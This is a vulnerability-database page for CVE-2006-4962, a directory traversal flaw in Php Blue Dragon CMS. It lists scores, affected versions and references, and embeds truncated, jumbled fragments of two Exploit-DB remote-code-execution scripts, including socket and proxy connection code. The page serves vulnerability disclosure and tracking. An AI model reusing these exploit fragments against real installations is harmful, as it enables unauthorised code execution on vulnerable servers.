CVE-2006-4962
published 2006-09-23CVE-2006-4962: Directory traversal vulnerability in pbd_engine.php in Php Blue Dragon 2.9.1 and earlier allows remote attackers to read and execute arbitrary local files via…
PriorityP335medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EXPLOIT
EPSS
3.28%
86.9th percentile
Directory traversal vulnerability in pbd_engine.php in Php Blue Dragon 2.9.1 and earlier allows remote attackers to read and execute arbitrary local files via a .. (dot dot) sequence via the phpExt parameter, as demonstrated by executing PHP code in a log file.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| blue_dragon | php_blue_dragon | — | — |
| blue_dragon | php_blue_dragon | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP Blue Dragon CMS 3.0.0 - Remote Code Execution
exploitdb·2007-08-10
CVE-2006-4962 PHP Blue Dragon CMS 3.0.0 - Remote Code Execution
PHP Blue Dragon CMS 3.0.0 - Remote Code Execution
---
126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function wyslijpakiet($pakiet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fs
Exploit-DB
PHP Blue Dragon CMS 2.9.1 - Cross-Site Scripting / SQL Injection Code Execution
exploitdb·2006-09-20
CVE-2006-4962 PHP Blue Dragon CMS 2.9.1 - Cross-Site Scripting / SQL Injection Code Execution
PHP Blue Dragon CMS 2.9.1 - Cross-Site Scripting / SQL Injection Code Execution
---
#!/usr/bin/php -q -d short_open_tag=on
query($sql))
{
EchoWarning("DE", "Can not exec query",__FILE__,__LINE__,$sql);
}
$Result = $DragonDBKernel -> fetch_array();
$Rows = $DragonDBKernel -> fetch_num_array();
if($Rows != 1)
{
// B³±d pobierania informacji o module
EchoWarning("PE", "Could not get module configuration",__FILE__,__LINE__,$sql);
}
else
{
...
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
this works against register_globals=On
*/
print $devilteam;
if ($argc 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n";
No writeups or analysis indexed.
http://secunia.com/advisories/22031http://www.securityfocus.com/bid/20123http://www.securityfocus.com/bid/25264http://www.vupen.com/english/advisories/2006/3736https://exchange.xforce.ibmcloud.com/vulnerabilities/29067https://www.exploit-db.com/exploits/2402https://www.exploit-db.com/exploits/4277http://secunia.com/advisories/22031http://www.securityfocus.com/bid/20123http://www.securityfocus.com/bid/25264http://www.vupen.com/english/advisories/2006/3736https://exchange.xforce.ibmcloud.com/vulnerabilities/29067https://www.exploit-db.com/exploits/2402https://www.exploit-db.com/exploits/4277
2006-09-23
Published